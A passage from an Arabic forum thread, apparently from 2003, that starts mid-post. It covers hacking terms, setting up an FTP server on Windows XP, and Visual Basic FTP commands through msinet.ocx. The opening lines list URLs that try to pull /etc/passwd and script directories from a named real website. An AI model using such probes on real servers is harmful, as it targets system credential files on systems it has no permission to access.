    http://www.naseej.com/ftp
    او ftp://ftp.naseej.com/etc/passwd او ftp://www.naseej.com/etc/passwd
    وان لم يكن يدعم برتكول نقل الملفات يمكن بالطريقه التاليه:
    او http://www.naseej.com/scrpits
    او http://www.naseej.com/etc-bin

    مصطلحات:

    منفذ الأوامر shell

    جلسة session

    اخترق break in

    منفذ port

    حساب غير الجذر non-root account

    ملفات الدخول logs files

    كيف يعمل HowTo

    مخطوطة s***pt

    برل Perl

    صفحة العون man page

    مكتبة librery

    بعيدا عن الموقع- موقع مقفل offsite

    الدخولات logs

    منفذ شبكي network port

    اسئلة واجوبة - جهازك كمزود FTP

    السؤال:

    هل أستطيع أن أجعل جهازي مزود FTP SERVER من خلال Windows XP و بدون تثبيت أي برامج إضافية؟

    الاجابة:

    نعم هذا ممكن و للقيام بذلك اذهب الى لوحة التحكم ثم إضافة أو إزالة البرامج ثم إضافة /إزالة مكونات Windows ثم انقر مرتين على البند (Internet Information Services (IIS ثم ضع إشارة على المربع File Transfer Protocol (FTP)Service ثم اضغط موافق و سيتم تنصيب المكونات الإضافية.

    بعد الإنتهاء من تثبيت المكونات الإضافية اذهب الى أدوات إدارية ثم خدمات معلومات إنترنت و هناك اذهب الى مواقع FTP و داخل هذا المجلد على الجهة الأخرى من النافذة اضغط بالزر الأيمن للفأرة فوق العنصر الظاهر في النافذة و اختر خصائص و هناك :

    أولا: التبويب موقع FTP و فيه أدخل البيانات التالية:

    تحت التعريف تجد:

    الوصف: أدخل فيه تسمية أو وصف لمزودك بكلمات مختصرة مثل "موقع أحمد للبرامج".

    عنوان IP:و أدخل فيه عنوان IP لجهازك و للتعرف عليه يلزمك أثناء الإتصال بالإنترنت أن تنقر مرتين على أيقونة الإتصال بالإنترنت التي تظهر في الزاوية من شريط المهام ثم اذهب الى خصائص ثم عنوان IP الوكيل و هذا هو عنوان IP لجهازك.

    منفذ TCP: لا تغير فيه شيئا.

    تحت الاتصالات:

    أمام محدد بــ: حدد عدد الأشخاص المسموح لهم بالولوج و التحميل من موقعك.

    مهلة الإتصال: لا تغير فيه شيئا.

    ضع إشارة أمام تمكين تسجيل الدخول إذا أردت الحصول على معلومات تفصيلية عمن دخل الى موقعك و ماذا فعل بالضبط.

    عند الضغط على " جلسات العمل الحالية تستطيع التعرف على عناوين IP للأشخاص المتصلين أو الداخلين الى مزود FTP في جهازك.
    ثانيا: تبويب حسابات الأمان و يفضل عدم تغيير إعداداتها.

    ثالثا: تبويب رسائل:تكتب فيه أي رسائل أو تنبيهات للزوار.

    رابعا: تبويب الدليل الرئيسي:

    تحت دليل موقع FTP :

    أمام المسار المحلي ضع مسار المجلد الذي يحتوي على البرامج التي تريد توفيرها للزوار مثلا : c:\FTP

    تستطيع تحديد المزايا المتاحة للزوار : 1- القراءة 2- الكتابة.

    خامسا: تبويب أمان الدليل:

    تستطيع إضافة عناوين IP للأشخاص الذين تريد منعهم من الدخول الى مزود FTP في جهازك.
    بعد الإنتهاء سيكون لديك موقع FTP شبيه بهذا ftp://212.66.77.111 حيث تمثل الأرقام عنوان IP الخاص بك.

    microsoft internet transfer ما هي أداة

    (msinet.ocx)

    وما هي استخداماتها التطبيقية

    سأبدأ أولاً بشرح طريقة استخدام هذه الأداة لتحميل صفحات الويب وأقصد هنا شيفرة الصفحة فقط وليست صفحة ويب كاملة كما تظهر في أي مستعرض للإنترنت وتتم هذه العملية على النحو التالي:

    الشيفرة البرمجية التي تستخدم لتحميل صفحة ويب هي

    Inet1.OpenURL("http://www.anyDomain.com")

    كما ذكرت في السطور السابقة بخصوص هذه الأداة أنها لا تستطيع استعراض صفحات ويب كاملة كما نراها في العادة ولكنها تدعم استعراض النصوص فقط فمثلاً يمكنك استعراض اي ملفي نصي بنفس الصيغة السابقة

    Inet1.OpenURL("http://www.anyDomain.com/anyFile.txt")

    لاستخدام هذه الصيغة في مشروع فيجوال بيسك يجب تعيين أداة مناسبة تقوم بعرض النصوص التي ستقوم الأداة بتحميلها من الانترنت ومن أشهر هذه الأدوات هو مربع نص وتكون الصيغة النهائية كما يلي

    Text1.text = Inet1.OpenURL("http://www.anyDomain.com")

    _______________________________

    FTP الآن نبدأ في الجزء الأصعب من استخدام هذه الأداة وهو نقل الملفات باستخدام

    FTP SERVER أولاً مرحلة الاتصال بالجهاز الخادم

    تحديد البروتوكول

    Inet1.Protocol = icFTP

    تعيين الموقع على الإنترنت

    Inet1.URL = " FTP://ftp.anyFTPDomain.com "

    في حالة اذا كان الموقع خاص يجب تحديد اسم مستخدم وكلمة سر

    Inet1.Password = " anyPassword "

    Inet1.UserName = " anyUserName "

    في حالة اذا كان الموقع عام

    Inet1.Password = " any email address "

    Inet1.UserName = " anonymous "

    أخيراً عملية الاتصال بالجهاز الخادم

    Text1.text = Inet1.OpenURL

    ثانياً مرحلة التعامل مع الملفات على الجهاز الخادم

    عند اتمام عملية الاتصال سيجد المستخدم نفسه داخل مجلد خاص هذا المجلد هو الذي يتم التعامل معه لإجراء العديد من العمليات مثل تحميل الملفات و نقل الملفات وتغيير اسم الملفات ومسح الملفات ولكن هذه العمليات ليست جميعها متوفرة لأي مستخدم ولكن حسب الصلاحيات التي يحددها مالك الجهاز

    البحث عن ملف في مجلد معين

    Inet1.Execute Inet1.URL " DIR /anyFolder anyFile.txt "

    الانتقال إلى مجلد معين

    Inet1.Execute Inet1.URL " CD anyFolder "

    أو

    Inet1.Execute Inet1.URL " CD anyMainFolder \ anySubFolder "

    الانتقال من مجلد فرعي الى مجلد رئيسي

    Inet1.Execute Inet1.URL " CDUP "

    أو

    Inet1.Execute Inet1.URL " CD .. "

    download تنزيل ملف الى جهازك

    يجب تحديد الملف المطلوب وكذلك تحديد مكان تنزيله على جهازك

    Inet1.Execute Inet1.URL " GET anyFile.txt c:\ anyFile.txt "

    أو

    Inet1.Execute Inet1.URL " RECV anyFile.txt c:\ anyFile.txt "

    upload تحميل ملف من جهازك الى الجهاز البعيد

    Inet1.Execute Inet1.URL " PUT c:\ anyFile.txt anyFolder / anyFile.txt "

    أو

    Inet1.Execute Inet1.URL " SEND c:\ anyFile.txt anyFolder / anyFile.txt "

    عمل مجلد جديد

    Inet1.Execute Inet1.URL " MKDIR / anyFolderName "

    حذف مجلد

    Inet1.Execute Inet1.URL " RMDIR anyFolderName "

    تغيير اسم ملف

    Inet1.Execute Inet1.URL " RENAME oldFileName.txt newFileName.txt "

    معرفة حجم ملف معين

    Inet1.Execute Inet1.URL " SIZE / anyFile.txt "

    إنهاء الاتصال الحالي مع الجهاز الخادم

    Inet1.Execute Inet1.URL " QUIT "


    هكذا نكون قد وصلنا الى نهاية الحديث عن هذه الاداة طبعاً هناك الكثير من المعلومات الاخرى التي يجب معرفتها عند التعامل مع هذه الاداة والتي يمكنكم استكشافها ومعرفة طريقة عملها ولكن أردت هنا فقط اعطائكم الخطوات الاولى والمهمة في هذا المجال أرجو منكم محاولة الاطلاع على المزيد


    تحياتي المهاجر
     
  2.   مشاركة رقم : 2    ‏2003-05-17
  3. مُجَاهِد

    مُجَاهِد قلم ماسي

    التسجيل :
    ‏2003-05-11
    المشاركات:
    14,043
    الإعجاب :
    0
    مجهود رائع..

    ومشكووووور..
    _____
    تحياتي ..
     

مشاركة هذه الصفحة